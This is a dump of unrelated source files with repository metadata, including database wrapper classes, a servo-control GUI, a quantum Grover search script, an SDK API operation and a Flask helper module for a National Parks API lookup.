'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617069,
'prefix': '#',
'preferredTitle': 'PROGRESSIVE EXTERNAL OPHTHALMOPLEGIA WITH MITOCHONDRIAL DNA DELETIONS, AUTOSOMAL RECESSIVE 3; PEOB3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckFace': 'Facial muscle weakness {SNOMEDCT:95666008} {ICD10CM:R29.810} {ICD9CM:438.83,781.94} {UMLS C0427055,C4553723 HP:0030319,HP:0007209} {HPO HP:0030319 C4022514}',
'headAndNeckEyes': '''External ophthalmoplegia, progressive {SNOMEDCT:46252003} {ICD10CM:H49.4} {ICD9CM:378.72} {UMLS C0162674 HP:0000544,HP:0000590} {HPO HP:0000590 C0162674};\nPtosis {SNOMEDCT:11934000,29696001} {ICD10CM:H02.4,H02.40,H02.409} {ICD9CM:374.3,374.30} {UMLS C0005745,C0033377 HP:0000508} {HPO HP:0000508 C0005745} {EOM ID:1bd157b764ec7aea IMG:Ptosis-small.jpg}''',
'chestRibsSternumClaviclesAndScapulae': 'Scapular winging {SNOMEDCT:17211005} {UMLS C0240953 HP:0003691} {HPO HP:0003691 C0240953,C4072849}',
'abdomenGastrointestinal': 'Dysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168}',
'muscleSoftTissue': '''Muscle weakness, proximal {SNOMEDCT:249939004} {UMLS C0221629 HP:0003701} {HPO HP:0003701 C0221629,C1838869};\nMuscle atrophy, mild, proximal {UMLS C4313893} {HPO HP:0003202 C0234958,C0270948,C0541794,C1843479};\nMitochondrial myopathy {SNOMEDCT:16851005} {UMLS C0162670 HP:0003737} {HPO HP:0003737 C0162670};\nMyopathic features seen on EMG {UMLS C4231415};\nRagged red fibers seen on muscle biopsy {UMLS C3151935};\nCOX-negative fibers {UMLS C3554465};\nSkeletal muscle shows mtDNA deletions {UMLS C4313892};\nDecreased activities of mitochondrial-encoded respiratory chain complexes {UMLS C1835995 HP:0008972} {HPO HP:0008972 C1835995,C3276441,C4024609}''',
'voice': 'Dysarthria {SNOMEDCT:8011004} {ICD9CM:438.13,784.51} {UMLS C0013362,C4553903 HP:0001260} {HPO HP:0001260 C0013362}',
'laboratoryAbnormalities': '''Increased serum creatine kinase, mild {UMLS C3554474} {HPO HP:0003236 C0151576,C0241005};\nIncreased serum lactate, mild {UMLS C3809341} {HPO HP:0002151 C1836440}''',
'miscellaneous': '''Onset in mid-forties {UMLS C4228253};\nTwo Finnish sisters have been reported (last curated August 2016) {UMLS C4313890}''',
'molecularBasis': 'Caused by mutation in the nuclear-encoded mitochondrial thymidine kinase gene (TK2, {188250.0007})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': True,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': True,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': True,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
}
} ]
}
} } | [
"jhostyk@gmail.com"
] | jhostyk@gmail.com |
9b3b0b566cc27e0ffd4aa7a2d05b1dbf2f37476f | b778cae4c54893a7855987fc9b612f10047c0dad | /001_dependents/uluc_db_controller.py | f10a83abf18010e4840a3616c80146e1a8fe409b | [] | no_license | firataras07/ottoo.dp.b2b | a4577c8ef53cb7a45ac86f4875052c59b7b44417 | 70092545c873887f237a86f52677caf063180708 | refs/heads/main | 2023-07-13T12:41:09.847622 | 2021-08-23T06:11:19 | 2021-08-23T06:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,729 | py | # -*- coding: UTF-8 -*-
#
# @author: Uluc Furkan Vardar
# @updatedDate: 17.01.2021
# @version: 1.0.0
# Universal Db Controllar class
import os
import datetime
import json
class msSQL_db_controller:
def __init__(self, db_connection):
import pymssql
self.credentials = db_connection
self.cnxn = pymssql.connect(
server=self.credentials['server'],
user=self.credentials['user'],
password=self.credentials['password'],
database=self.credentials['database'],
host=self.credentials['host']
)
def execute_only(self,sql):
try:
with self.cnxn.cursor() as cur:
cur.execute(sql)
self.cnxn.commit()
try:
self.lastrowid = cur.lastrowid
except Exception as e:
print (e)
return True, None
except Exception as e:
if 'Duplicate entry' in str(e[1]):
print (str(e[1]), 'sql : ,\n%s'%(sql))
return False, 'Duplicate entry'
else:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return False, None
def execute_and_return(self, sql):
try:
with self.cnxn.cursor(as_dict=True) as cur:
cur.execute(sql)
#cur.as_dict
#self.cnxn.commit()
r = cur.fetchone()
if r !=None:
return r, None
else:
return False, 'No returned row!'
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def execute_and_return_all(self, sql):
try:
with self.cnxn.cursor(as_dict=True) as cur:
cur.execute(sql)
#self.cnxn.commit()
r = cur.fetchall()
if r == None:
return False, 'No returned row!'
return r, None
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def __del__(self):
#print ("QUIT DB")
try:
self.cnxn.close()
except Exception:
pass
class mySQL_db_controller:
def __init__(self, db_connection):
self.lastrowid = None
self.credentials = db_connection
print ( self.credentials)
import pymysql
try:
self.conn = pymysql.connect(
host=self.credentials['host'],
user=self.credentials['user'],
passwd=self.credentials['password'],
db=self.credentials['database'],
connect_timeout=5,
charset='utf8',
cursorclass=pymysql.cursors.DictCursor )
except Exception as e:
#print (e)
raise Exception('DB Connection Error', e)
def execute_only(self,sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
try:
self.lastrowid = cur.lastrowid
except Exception as e:
print (e)
return True, None
except Exception as e:
if 'Duplicate entry' in str(e[1]):
print (str(e[1]), 'sql : ,\n%s'%(sql))
return False, 'Duplicate entry'
else:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return False, None
def execute_and_return(self, sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
field_names = [i[0] for i in cur.description]
self.conn.commit()
r = cur.fetchone()
if r !=None:
return r, None
else:
return False, 'No returned row!'
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
def execute_and_return_all(self, sql):
d = []
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
r = cur.fetchone()
if r == None:
return False, 'No returned row!'
while r!=None:
d.append( r )
r = cur.fetchone()
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return d,None
def execute_and_return_cursor(self, sql):
try:
with self.conn.cursor() as cur:
cur.execute(sql)
self.conn.commit()
return cur
except Exception as e:
raise Exception (str(e[1]), 'sql : ,\n%s'%(sql))
return d,None
def __del__(self):
#print ("QUIT DB")
try:
self.conn.close()
except Exception:
pass
def ex():
from uluc_db_controller import msSQL_db_controller
db_c = msSQL_db_controller(mssql_config)
resp, msg = db_c.execute_only(sql)
if msg != None:
return {'status': msg }
#MY SQL
from uluc_db_controller import mySQL_db_controller
db_c = mySQL_db_controller(mysql_config)
resp, msg = db_c.execute_only(sql)
if msg != None:
return {'status': msg }
| [
"ulucfurkanvardar@gmail.com"
] | ulucfurkanvardar@gmail.com |
7a075b8464b6cfad9e9f486f45d0b797c86ce09e | 6ebd682476e127ec955a08448d2488e00cbacaa2 | /ipma/items.py | 8c8be52a70f9fd665af39fcd999bbcd6d6623352 | [] | no_license | mbs-systems/scrapy | c2ddcf803b1b91bec193e6e1e43f3a6bf3f4aa93 | 2e4c96a05cc2e2558e9ed023e3c989160a6ec625 | refs/heads/master | 2020-04-05T17:55:49.009133 | 2018-11-11T17:11:18 | 2018-11-11T17:11:18 | 157,081,138 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class IpmaItem(Item):
page = Field()
text = Field()
link = Field()
| [
"maik.brauer@mbs-systems.net"
] | maik.brauer@mbs-systems.net |
4d8b7e849c99337bdf40184ff6f713792cf5e684 | b15d2787a1eeb56dfa700480364337216d2b1eb9 | /accelbyte_py_sdk/api/ugc/operations/admin_content/admin_hide_user_content.py | 0f01ddb7d2935b0f0a7006933cbe704ffd016507 | [
"MIT"
] | permissive | AccelByte/accelbyte-python-sdk | dedf3b8a592beef5fcf86b4245678ee3277f953d | 539c617c7e6938892fa49f95585b2a45c97a59e0 | refs/heads/main | 2023-08-24T14:38:04.370340 | 2023-08-22T01:08:03 | 2023-08-22T01:08:03 | 410,735,805 | 2 | 1 | MIT | 2022-08-02T03:54:11 | 2021-09-27T04:00:10 | Python | UTF-8 | Python | false | false | 8,991 | py | # Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: ags_py_codegen
# pylint: disable=duplicate-code
# pylint: disable=line-too-long
# pylint: disable=missing-function-docstring
# pylint: disable=missing-module-docstring
# pylint: disable=too-many-arguments
# pylint: disable=too-many-branches
# pylint: disable=too-many-instance-attributes
# pylint: disable=too-many-lines
# pylint: disable=too-many-locals
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-return-statements
# pylint: disable=too-many-statements
# pylint: disable=unused-import
# AccelByte Gaming Services Ugc Service (2.11.3)
from __future__ import annotations
from typing import Any, Dict, List, Optional, Tuple, Union
from .....core import Operation
from .....core import HeaderStr
from .....core import HttpResponse
from ...models import ModelsCreateContentResponse
from ...models import ModelsHideContentRequest
from ...models import ResponseError
class AdminHideUserContent(Operation):
"""Hide/Unhide user's generated contents (AdminHideUserContent)
Required permission ADMIN:NAMESPACE:{namespace}:USER:{userId}:CONTENT [UPDATE].
Required Permission(s):
- ADMIN:NAMESPACE:{namespace}:USER:{userId}:CONTENT [UPDATE]
Properties:
url: /ugc/v1/admin/namespaces/{namespace}/users/{userId}/contents/{contentId}/hide
method: PUT
tags: ["Admin Content"]
consumes: ["application/json"]
produces: ["application/json"]
securities: [BEARER_AUTH]
body: (body) REQUIRED ModelsHideContentRequest in body
content_id: (contentId) REQUIRED str in path
namespace: (namespace) REQUIRED str in path
user_id: (userId) REQUIRED str in path
Responses:
200: OK - ModelsCreateContentResponse (OK)
401: Unauthorized - ResponseError (Unauthorized)
404: Not Found - ResponseError (Not Found)
500: Internal Server Error - ResponseError (Internal Server Error)
"""
# region fields
_url: str = (
"/ugc/v1/admin/namespaces/{namespace}/users/{userId}/contents/{contentId}/hide"
)
_method: str = "PUT"
_consumes: List[str] = ["application/json"]
_produces: List[str] = ["application/json"]
_securities: List[List[str]] = [["BEARER_AUTH"]]
_location_query: str = None
body: ModelsHideContentRequest # REQUIRED in [body]
content_id: str # REQUIRED in [path]
namespace: str # REQUIRED in [path]
user_id: str # REQUIRED in [path]
# endregion fields
# region properties
@property
def url(self) -> str:
return self._url
@property
def method(self) -> str:
return self._method
@property
def consumes(self) -> List[str]:
return self._consumes
@property
def produces(self) -> List[str]:
return self._produces
@property
def securities(self) -> List[List[str]]:
return self._securities
@property
def location_query(self) -> str:
return self._location_query
# endregion properties
# region get methods
# endregion get methods
# region get_x_params methods
def get_all_params(self) -> dict:
return {
"body": self.get_body_params(),
"path": self.get_path_params(),
}
def get_body_params(self) -> Any:
if not hasattr(self, "body") or self.body is None:
return None
return self.body.to_dict()
def get_path_params(self) -> dict:
result = {}
if hasattr(self, "content_id"):
result["contentId"] = self.content_id
if hasattr(self, "namespace"):
result["namespace"] = self.namespace
if hasattr(self, "user_id"):
result["userId"] = self.user_id
return result
# endregion get_x_params methods
# region is/has methods
# endregion is/has methods
# region with_x methods
def with_body(self, value: ModelsHideContentRequest) -> AdminHideUserContent:
self.body = value
return self
def with_content_id(self, value: str) -> AdminHideUserContent:
self.content_id = value
return self
def with_namespace(self, value: str) -> AdminHideUserContent:
self.namespace = value
return self
def with_user_id(self, value: str) -> AdminHideUserContent:
self.user_id = value
return self
# endregion with_x methods
# region to methods
def to_dict(self, include_empty: bool = False) -> dict:
result: dict = {}
if hasattr(self, "body") and self.body:
result["body"] = self.body.to_dict(include_empty=include_empty)
elif include_empty:
result["body"] = ModelsHideContentRequest()
if hasattr(self, "content_id") and self.content_id:
result["contentId"] = str(self.content_id)
elif include_empty:
result["contentId"] = ""
if hasattr(self, "namespace") and self.namespace:
result["namespace"] = str(self.namespace)
elif include_empty:
result["namespace"] = ""
if hasattr(self, "user_id") and self.user_id:
result["userId"] = str(self.user_id)
elif include_empty:
result["userId"] = ""
return result
# endregion to methods
# region response methods
# noinspection PyMethodMayBeStatic
def parse_response(
self, code: int, content_type: str, content: Any
) -> Tuple[
Union[None, ModelsCreateContentResponse],
Union[None, HttpResponse, ResponseError],
]:
"""Parse the given response.
200: OK - ModelsCreateContentResponse (OK)
401: Unauthorized - ResponseError (Unauthorized)
404: Not Found - ResponseError (Not Found)
500: Internal Server Error - ResponseError (Internal Server Error)
---: HttpResponse (Undocumented Response)
---: HttpResponse (Unexpected Content-Type Error)
---: HttpResponse (Unhandled Error)
"""
pre_processed_response, error = self.pre_process_response(
code=code, content_type=content_type, content=content
)
if error is not None:
return None, None if error.is_no_content() else error
code, content_type, content = pre_processed_response
if code == 200:
return ModelsCreateContentResponse.create_from_dict(content), None
if code == 401:
return None, ResponseError.create_from_dict(content)
if code == 404:
return None, ResponseError.create_from_dict(content)
if code == 500:
return None, ResponseError.create_from_dict(content)
return self.handle_undocumented_response(
code=code, content_type=content_type, content=content
)
# endregion response methods
# region static methods
@classmethod
def create(
cls,
body: ModelsHideContentRequest,
content_id: str,
namespace: str,
user_id: str,
**kwargs,
) -> AdminHideUserContent:
instance = cls()
instance.body = body
instance.content_id = content_id
instance.namespace = namespace
instance.user_id = user_id
return instance
@classmethod
def create_from_dict(
cls, dict_: dict, include_empty: bool = False
) -> AdminHideUserContent:
instance = cls()
if "body" in dict_ and dict_["body"] is not None:
instance.body = ModelsHideContentRequest.create_from_dict(
dict_["body"], include_empty=include_empty
)
elif include_empty:
instance.body = ModelsHideContentRequest()
if "contentId" in dict_ and dict_["contentId"] is not None:
instance.content_id = str(dict_["contentId"])
elif include_empty:
instance.content_id = ""
if "namespace" in dict_ and dict_["namespace"] is not None:
instance.namespace = str(dict_["namespace"])
elif include_empty:
instance.namespace = ""
if "userId" in dict_ and dict_["userId"] is not None:
instance.user_id = str(dict_["userId"])
elif include_empty:
instance.user_id = ""
return instance
@staticmethod
def get_field_info() -> Dict[str, str]:
return {
"body": "body",
"contentId": "content_id",
"namespace": "namespace",
"userId": "user_id",
}
@staticmethod
def get_required_map() -> Dict[str, bool]:
return {
"body": True,
"contentId": True,
"namespace": True,
"userId": True,
}
# endregion static methods
| [
"elmernocon@gmail.com"
] | elmernocon@gmail.com |
682efabebab7374e91d53d7a58b7c8d12311a35f | 839cd5616d63825192dffb3730dacb67619bda2f | /modules/maintenance/db_handler.py | a9fee5494a01f2ffb7d6522b31dab2bc848df453 | [] | no_license | Gr3yG00se64/overwatch | 1e0777005a28cc3e8e3b32d130935d6ee4163110 | 090f3d8aafe758ae29b4c5add346e1bc51cc923a | refs/heads/master | 2020-09-12T09:16:55.854617 | 2020-04-20T06:01:35 | 2020-04-20T06:01:35 | 222,378,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,639 | py | #Local Dependencies
import config
#Package Dependencies
from pymongo import MongoClient
def remove_alerts(alerts):
#Establish DB Connection
connection = MongoClient(config.mongoURI)
#Set Up DB for Alerts
alertDB = connection["alerts"]
alertCollection = alertDB["alerts"]
if alerts:
for alert in alerts:
alertCollection.remove({'_id': alert.get('_id')})
def retrieve_alerts():
alerts = []
# Establish DB Connection
connection = MongoClient(config.mongoURI)
# Retrieve names of all databases
dbNames = connection.list_database_names()
if 'alerts' in dbNames:
# Set Up DB for Alerts
alertDB = connection["alerts"]
alertCollection = alertDB["alerts"]
#Retrieve all alerts
db_alerts = alertCollection.find()
#Generate list of alerts
for alert in db_alerts:
alerts.append(alert)
return alerts
#Returns list of dictionaries that contained registered device information
def retrieve_regDevices():
regDevices = []
#Establish DB Connection
connection = MongoClient(config.mongoURI)
# Retrieve names of all databases
dbNames = connection.list_database_names()
if 'netmap' in dbNames:
#Set up DB for NetMap Devices
netmapDB = connection["netmap"]
netmapCollection = netmapDB["netmaps"]
#Retrieve all registered devices
devices = netmapCollection.find()
#Generate list of registered devices
for device in devices:
regDevices.append(device)
#Export the list of dictonaries
return regDevices
| [
"Gr3yG00se@protonmail.com"
] | Gr3yG00se@protonmail.com |
f1526f327e2c49c3286b1241e61d0b56db652768 | cf2daa38a23dbab72d9538a5b12b5a32a6f43cd3 | /ultra_gui.py | be3b1b7853096f3369aa4632df39de8237625ebb | [
"Apache-2.0"
] | permissive | barum-jam-collective/PiWars2021-General | 2d7b54773e0995e0b2e6856b3d0c3ca849758de0 | 5edbc706332c942309ee6922dd11342b8ae0c290 | refs/heads/main | 2023-05-08T19:56:29.080659 | 2021-05-23T16:44:14 | 2021-05-23T16:44:14 | 337,853,444 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,727 | py | # Python GUI for Servo control
# Specifically written for and in lieu of PiBorg's vesion for the UltraBorg Servo and Sensor Board
# This is a small program for testing PiBorgs UltrabBorg Servo and Ultrasonic Sensor board.
# When run it creates a GUI with 4 sliders that can be used to operate Servos connected to the UltraBorg.
# There is currently no code to test Ultrasonic Senors
# 10 Feb 2021
#import libraries
import UltraBorg3 as UltraBorg
from guizero import App, Box, Slider, Text, TextBox, PushButton
# Start the UltraBorg
global UB
UB = UltraBorg.UltraBorg()
UB.Init()
def set_initial_servo_positions():
# To read the saved servo positiona and set the slider start position?
slider1_value = UB.GetServoPosition1()
slider2_value = UB.GetServoPosition2()
slider3_value = UB.GetServoPosition3()
slider4_value = UB.GetServoPosition4()
UB.SetServoPosition1(float(slider1_value) / 100.0)
UB.SetServoPosition2(float(slider1_value) / 100.0)
UB.SetServoPosition3(float(slider1_value) / 100.0)
UB.SetServoPosition4(float(slider1_value) / 100.0)
# Print the servo positions to the sccreen
print("Servo 1 = ",slider1_value)
print("Servo 2 = ",slider2_value)
print("Servo 3 = ",slider3_value)
print("Servo 4 = ",slider4_value)
def slider1_changed(slider1_value):
global UB
textbox1.value = UB.GetServoPosition1() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition1(float(slider1_value) / 90)
def slider2_changed(slider2_value):
global UB
textbox2.value = UB.GetServoPosition2() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition2(float(slider2_value) / 90)
def slider3_changed(slider3_value):
global UB
textbox3.value = UB.GetServoPosition3() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition3(float(slider3_value) / 90)
def slider4_changed(slider4_value):
global UB
textbox4.value = UB.GetServoPosition4() #retrieves the servo position and displays it in the box below the slider
UB.SetServoPosition4(float(slider4_value) / 90)
# Reset the servos
def reset_servo1():
UB.SetServoPosition1(float(0) / 90)
textbox1.value = UB.GetServoPosition1()
slider1.value="0"
def reset_servo2():
UB.SetServoPosition1(float(0) / 90)
textbox2.value = UB.GetServoPosition2()
slider2.value="0"
def reset_servo3():
UB.SetServoPosition3(float(0) / 90)
textbox1.value = UB.GetServoPosition3()
slider3.value="0"
def reset_servo4():
UB.SetServoPosition4(float(0) / 90)
textbox1.value = UB.GetServoPosition4()
slider4.value="0"
app = App(title="Servo Control") # Window Title
message = Text(app, text="UltraBorg Servo Control - Move the sliders to control servos") # Text to display inside window
set_initial_servo_positions() # Not sure if this is working
#create the sliders in the window and link to control functions
slider1 = Slider(app, command=slider1_changed, start=-90, end=90, width='fill')
textbox1 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo1)
slider2= Slider(app, command=slider2_changed, start=-90, end=90, width='fill')
textbox2 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo2)
slider3= Slider(app, command=slider3_changed, start=-90, end=90, width='fill')
textbox3 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo3)
slider4= Slider(app, command=slider4_changed, start=-90, end=90, width='fill')
textbox4 = TextBox(app)
button = PushButton(app, text="Reset", command=reset_servo4)
#display everything
app.display()
| [
"noreply@github.com"
] | barum-jam-collective.noreply@github.com |
6c0c42ab44dab3984b93fc4dcd90b4953dd419fe | b7aba8b3e94d8a5261d6bfeb54deb25813d89f97 | /python/669_trim_a_binary_search_tree.py | 3dd9f2cf2ee7eb7f74269e45370da077884dd654 | [] | no_license | jianq1994/leetcode | 34cd88d567fe675a8a545c968f4994dfbb7af42b | d68b5ac6359a06e144fc6273978d91c5f73093f1 | refs/heads/master | 2022-02-23T03:07:45.532971 | 2019-08-19T20:46:19 | 2019-08-19T20:46:19 | 123,503,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def trimBST(self, root: TreeNode, L: int, R: int) -> TreeNode:
if not root:
return root
if root.val < L:
return self.trimBST(root.right,L,R)
if root.val > R:
return self.trimBST(root.left,L,R)
root.left = self.trimBST(root.left,L,R)
root.right = self.trimBST(root.right,L,R)
return root | [
"jianq1994@gmail.com"
] | jianq1994@gmail.com |
5b219f9223b9bcb10fddba2b26b7ab668b8326f1 | de8917857bfce63eb293cf8047ae67484236d15b | /Grover/0000/algorithm.py | d0654c1efaff9614ea58562ea77510653e689ba5 | [] | no_license | mcasanova1445/transmon-thesis | 73f15bd02bc5f6ecede6b8664e337993ac162931 | e4a4890c7b666debf6824306ab3f131575fef997 | refs/heads/master | 2020-03-09T00:06:30.327912 | 2019-02-15T17:18:11 | 2019-02-15T17:18:11 | 128,480,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,300 | py | # PageRank del grafo corona
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from scipy.stats import norm
from qutip import *
import tgates
import time
def Htrans(psi0):
res = tgates.H(psi0, 0)
res = tgates.H(res.states[-1], 1)
res = tgates.H(res.states[-1], 2)
return tgates.H(res.states[-1], 3)
def Us(psi0):
res = Htrans(psi0)
res = tgates.CCCP(res.states[-1], 1, 2, 3, 0, np.pi, b = 0b00)
return Htrans(res.states[-1])
def Uomega(psi0):
return tgates.CCCP(psi0, 0, 1, 2, 3, np.pi, b = 0b00)
'''
def Uomega(psi0):
return tgates.CCP(psi0, 0, 3, 2, np.pi, b = 0b10)
'''
'''
def Uomega(psi0):
return tgates.CP(psi0, 2, 1, np.pi, b = 0b01)
'''
qN = 2**4
# El algoritmo
# Estado fiducial
print('{}/{}/{} - {}:{}:{}\t Preparando estado fiducial...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5]))
psi0 = tensor(basis(2,0), basis(2,0), basis(2,0), basis(2,0))
# Preparación del estado inicial
print('{}/{}/{} - {}:{}:{}\t Preparando estado inicial...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5]))
res = Htrans(psi0)
Nit = 2*int(np.pi*np.sqrt(qN)/4)+1
for i in range(Nit):
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Aplicando Uomega...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
res = Uomega(res.states[-1])
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Aplicando Us...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
res = Us(res.states[-1])
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Guardando resultado de iteración...'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
qsave(res, 'it_{}'.format(i+1))
print('{}/{}/{} - {}:{}:{}\t Iteración {}/{}: Terminada'.format(time.localtime()[0], time.localtime()[1], time.localtime()[2], time.localtime()[3], time.localtime()[4], time.localtime()[5], i+1, Nit))
| [
"mcasanova1445@gmail.com"
] | mcasanova1445@gmail.com |
becccdb8da64a4c8fc094e6460056a3223cb42ea | f263cdf3c16a2880de4ac8de00dd77ecd27e8622 | /final_project/helpers.py | 79bf430becc319bdc65a49a67038a2c59180beb5 | [] | no_license | chasesliger/CS50_Intro | ff202b6f06924b509f6f49b9658d51112e5ffa15 | 56c3b72e19dbacb0f3f075bc8575f09765d91da6 | refs/heads/master | 2022-11-25T18:01:27.459680 | 2020-07-24T15:48:45 | 2020-07-24T15:48:45 | 270,345,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,263 | py | import os
import requests
import urllib.parse
import json
from flask import redirect, render_template, request, session
from functools import wraps
def apology(message, code=400):
"""Render message as an apology to user."""
def escape(s):
"""
Escape special characters.
https://github.com/jacebrowning/memegen#special-characters
"""
for old, new in [("-", "--"), (" ", "-"), ("_", "__"), ("?", "~q"),
("%", "~p"), ("#", "~h"), ("/", "~s"), ("\"", "''")]:
s = s.replace(old, new)
return s
return render_template("apology.html", top=code, bottom=escape(message)), code
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/1.0/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup_parks(state):
# get the NPS Key environmental variable, then try to send API request to National Park's website
try:
NPS_key = os.environ.get("NPS_KEY")
request = requests.get(f"https://developer.nps.gov/api/v1/parks?stateCode={state}&limit=100&fields=images&api_key={NPS_key}",)
request.raise_for_status()
except requests.RequestException:
return None
try:
# convert to json for processing
park_data = request.json()
data = park_data["data"]
# make a list to hold a dictionary for each park
parks = []
for row in data:
name = row["name"]
